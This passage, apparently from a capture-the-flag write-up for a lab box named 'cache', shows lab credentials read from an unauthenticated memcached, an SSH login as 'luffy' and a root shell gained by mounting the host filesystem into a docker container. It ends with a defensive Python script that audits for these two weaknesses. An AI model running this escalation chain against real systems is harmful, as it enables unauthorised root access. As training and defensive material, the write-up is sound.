STAT touch_misses 0
STAT auth_cmds 0
STAT auth_errors 0
STAT bytes_read 4597
STAT bytes_written 1200
STAT limit_maxbytes 67108864
STAT accepting_conns 1
STAT listen_disabled_num 0
STAT time_in_listen_disabled_us 0
STAT threads 4
STAT conn_yields 0
STAT hash_power_level 16
STAT hash_bytes 524288
STAT hash_is_expanding 0
STAT slab_reassign_rescues 0
STAT slab_reassign_chunk_rescues 0
STAT slab_reassign_evictions_nomem 0
STAT slab_reassign_inline_reclaim 0
STAT slab_reassign_busy_items 0
STAT slab_reassign_busy_deletes 0
STAT slab_reassign_running 0
STAT slabs_moved 0
STAT lru_crawler_running 0
STAT lru_crawler_starts 2040
STAT lru_maintainer_juggles 3984
STAT malloc_fails 0
STAT log_worker_dropped 0
STAT log_worker_written 0
STAT log_watcher_skipped 0
STAT log_watcher_sent 0
STAT bytes 371
STAT curr_items 5
STAT total_items 150
STAT slab_global_page_pool 0
STAT expired_unfetched 0
STAT evicted_unfetched 0
STAT evicted_active 0
STAT evictions 0
STAT reclaimed 0
STAT crawler_reclaimed 0
STAT crawler_items_checked 28
STAT lrutail_reflocked 0
STAT moves_to_cold 150
STAT moves_to_warm 0
STAT moves_within_lru 0
STAT direct_reclaims 0
STAT lru_bumps_dropped 0
END
get user
VALUE user 0 5
luffy
END
get passwd
VALUE passwd 0 9
0n3_p1ec3
END


3. Log in as luffy

ash@cache:/$ ssh luffy@127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:/qQ34g2zzGVlmbMIKeD7JhlhDf/SPzgYFz000v+3KBI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
luffy@127.0.0.1's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-109-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Thu Oct 1 10:34:55 UTC 2020

System load: 0.0 Processes: 181
Usage of /: 75.0% of 8.06GB Users logged in: 0
Memory usage: 12% IP address for ens160: 10.10.10.188
Swap usage: 0% IP address for docker0: 172.17.0.1


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

110 packages can be updated.
0 updates are security updates.


Last login: Wed May 6 08:54:44 2020 from 10.10.14.3
luffy@cache:~$
luffy@cache:~$ whoami
luffy
luffy@cache:~$uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)
luffy@cache:~$

4. Docker privilege escalation

luffy is a member of the docker group

Docker privilege escalation (reference)

luffy@cache:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
#
# python3 -c "import pty;pty.spawn('/bin/bash')"
root@386a1a19658b:/#
root@386a1a19658b:/#
root@386a1a19658b:/# cd
root@386a1a19658b:~# pwd
/root
root@386a1a19658b:~# ls
root.txt
root@386a1a19658b:~# cat root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
root@386a1a19658b:~#
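Both findings that carry this escalation, an unauthenticated memcached on loopback holding credentials and luffy's membership in the docker group (which can bind-mount / into a container, as shown above), are things a host audit can catch before anyone has a shell. The following Python is an added example rather than anything from the post: it parses constructed copies of the `ss -lnt` and `/etc/group` data seen on this box (the sudo and lxd lines in the group sample are assumptions, as is the set of groups treated as root-equivalent) and reports what needs review.

```python
# Constructed sample of `ss -lnt` output, copied in shape from the listing above.
SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      80     127.0.0.1:3306     0.0.0.0:*
LISTEN 0      128    127.0.0.1:11211    0.0.0.0:*
LISTEN 0      128    127.0.0.53%lo:53   0.0.0.0:*
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*
LISTEN 0      128    *:80               *:*
LISTEN 0      128    [::]:22            [::]:*
"""

# Constructed /etc/group excerpt; only the docker line (gid 999, member luffy)
# mirrors what `id` showed on the box, the other lines are assumptions.
GROUP_FILE = """\
root:x:0:
sudo:x:27:ash
docker:x:999:luffy
lxd:x:108:
"""

# Services with no authentication of their own: any local user who can reach
# the socket reads everything stored in them.
UNAUTHENTICATED_PORTS = {11211: "memcached"}

# Assumed policy: docker, lxd and disk hand out root without a password prompt
# (mount the host filesystem into a container / read raw block devices);
# sudo and wheel grant it through sudo.
ROOT_EQUIVALENT_GROUPS = {"docker", "lxd", "disk", "sudo", "wheel"}


def parse_listeners(ss_text):
    """Return (address, port) tuples for every LISTEN line of `ss -lnt` output."""
    listeners = []
    for line in ss_text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        # rpartition keeps IPv6 brackets and %scope suffixes in the address part
        addr, _, port = fields[3].rpartition(":")
        listeners.append((addr, int(port)))
    return listeners


def flag_listeners(ss_text):
    """Describe every listener that is an unauthenticated service."""
    findings = []
    for addr, port in parse_listeners(ss_text):
        if port in UNAUTHENTICATED_PORTS:
            scope = "loopback only" if addr.startswith("127.") else "network-reachable"
            findings.append("%s on %s:%d (%s): no auth, audit what is cached there"
                            % (UNAUTHENTICATED_PORTS[port], addr, port, scope))
    return findings


def flag_group_members(group_text):
    """Return (user, group, gid) for every member of a root-equivalent group."""
    findings = []
    for line in group_text.splitlines():
        parts = line.split(":")
        if len(parts) != 4:
            continue
        name, _, gid, members = parts
        if name in ROOT_EQUIVALENT_GROUPS:
            for user in filter(None, members.split(",")):
                findings.append((user, name, int(gid)))
    return findings


if __name__ == "__main__":
    for f in flag_listeners(SS_OUTPUT):
        print(f)
    for user, group, gid in flag_group_members(GROUP_FILE):
        print("%s is in root-equivalent group %s (gid %d)" % (user, group, gid))
```

On real hosts feed it the output of `ss -lnt` and the contents of /etc/group; a loopback-only memcached still counts, because it is exactly the local, unauthenticated hop from www-data/ash to luffy used above.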
------------- So much to say, so little paper; until next time -------------